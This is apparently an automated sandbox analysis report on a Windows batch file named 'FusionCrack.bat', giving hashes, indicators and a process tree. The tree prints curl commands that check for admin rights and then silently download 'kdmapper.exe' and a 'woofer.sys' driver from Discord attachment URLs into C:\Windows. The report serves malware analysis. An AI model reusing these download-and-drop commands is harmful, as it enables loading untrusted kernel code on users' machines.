1788eb6d64f5d282a551651f105b072791dc5540c2072b8b5ebc54f09150fccd

Analysis

max time kernel
137s
max time network
157s
platform
windows10-2004_x64
resource
win10v2004-20231023-en
resource tags

arch:x64arch:x86image:win10v2004-20231023-enlocale:en-usos:windows10-2004-x64system
submitted
29/10/2023, 16:48

Target

FusionCrack.bat
Size

1KB
MD5

658c2a8e39f0d75f6f8b910a72966da5
SHA1

c5df88eded176f3b17d91dc527cade5bf1ed4b4f
SHA256

1788eb6d64f5d282a551651f105b072791dc5540c2072b8b5ebc54f09150fccd
SHA512

588abe936783f93c3de9aadd63ad79c4d59b94739e0f422457cf4e0fdb9e528cddfdcc3307b7a25155092f16e59bdc3037ada86232ae6d8dc4c0e827866271d9

Score

4^/10

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\kdmapper.exe	curl.exe
File created	C:\Windows\woofer.sys	curl.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1020	timeout.exe

Suspicious use of WriteProcessMemory 14 IoCs

description	pid	Process	procid_target
PID 744 wrote to memory of 3620	744	cmd.exe	88
PID 744 wrote to memory of 3620	744	cmd.exe	88
PID 3620 wrote to memory of 1160	3620	net.exe	89
PID 3620 wrote to memory of 1160	3620	net.exe	89
PID 744 wrote to memory of 3508	744	cmd.exe	90
PID 744 wrote to memory of 3508	744	cmd.exe	90
PID 744 wrote to memory of 612	744	cmd.exe	94
PID 744 wrote to memory of 612	744	cmd.exe	94
PID 744 wrote to memory of 3880	744	cmd.exe	95
PID 744 wrote to memory of 3880	744	cmd.exe	95
PID 744 wrote to memory of 1020	744	cmd.exe	96
PID 744 wrote to memory of 1020	744	cmd.exe	96
PID 744 wrote to memory of 4664	744	cmd.exe	98
PID 744 wrote to memory of 4664	744	cmd.exe	98

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\FusionCrack.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:744
- C:\Windows\system32\net.exe
  net session
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3620
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 session
    3⤵
    PID:1160
- C:\Windows\system32\choice.exe
  CHOICE /C 123 /M "Escolha:"
  2⤵
  PID:3508
- C:\Windows\system32\curl.exe
  curl https://cdn.discordapp.com/attachments/1166461163492618271/1166461280194920478/kdmapper.exe -o C:\Windows\kdmapper.exe --silent
  2⤵
  - Drops file in Windows directory
  PID:612
- C:\Windows\system32\curl.exe
  curl https://cdn.discordapp.com/attachments/1166461163492618271/1166461288768098304/woofer.sys -o C:\Windows\woofer.sys --silent
  2⤵
  - Drops file in Windows directory
  PID:3880
- C:\Windows\system32\timeout.exe
  timeout /t 3 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:1020
- C:\Windows\system32\choice.exe
  CHOICE /C 123 /M "Escolha:"
  2⤵
  PID:4664

C:\Windows\kdmapper.exe

Filesize
234B

MD5
c24f73fe561679ac6fd66dc320ff59f2

SHA1
0f6120eee713e67b2bf7cd111d71412fc52939d8

SHA256
6995694f81bf16d402f3ee5f4d4a0a77794609233eb4eb99039bc0c8a2fe67e1

SHA512
3210f9e2897a5bd48ce936b2e8215cf854d1f5f56c9797c683ee47d8eb22a5f31793d48682c98bdb633adbff9c50ac3c8a92ab2884e713c4597e77078f43f8f4

Download Submit